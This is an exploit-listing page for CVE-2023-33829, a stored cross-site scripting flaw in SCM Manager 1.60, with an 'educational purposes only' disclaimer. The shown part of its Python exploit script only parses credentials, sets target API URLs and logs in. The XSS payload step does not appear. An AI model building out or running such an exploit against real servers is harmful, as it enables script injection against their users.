Exploits / Vulnerability Discovered : 2023-05-25 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Scm manager 1.60 crosssite scripting stored (authenticated) is for educational purposes only and if it is used you will do on your own risk!
# Main menu
parser = argparse.ArgumentParser(description='CVE-2023-33829 exploit')
parser.add_argument("-u", "--user", help="Admin user or user with write permissions")
parser.add_argument("-p", "--password", help="password of the user")
args = parser.parse_args()
# Credentials
user = sys.argv[2]
password = sys.argv[4]
# Global Variables
main_url = "http://localhost:8080/scm" # Change URL if its necessary
auth_url = main_url + "/api/rest/authentication/login.json"
users = main_url + "/api/rest/users.json"
groups = main_url + "/api/rest/groups.json"
repos = main_url + "/api/rest/repositories.json"
# Create a session
session = requests.Session()
# Credentials to send
post_data={
'username': user, # change if you have any other user with write permissions
'password': password # change if you have any other user with write permissions
}
r = session.post(auth_url, data=post_data)
if r.status_code == 200:
print("[+] Authentication successfully")
else:
print("[-] Failed to authenticate")
sys.exit(1)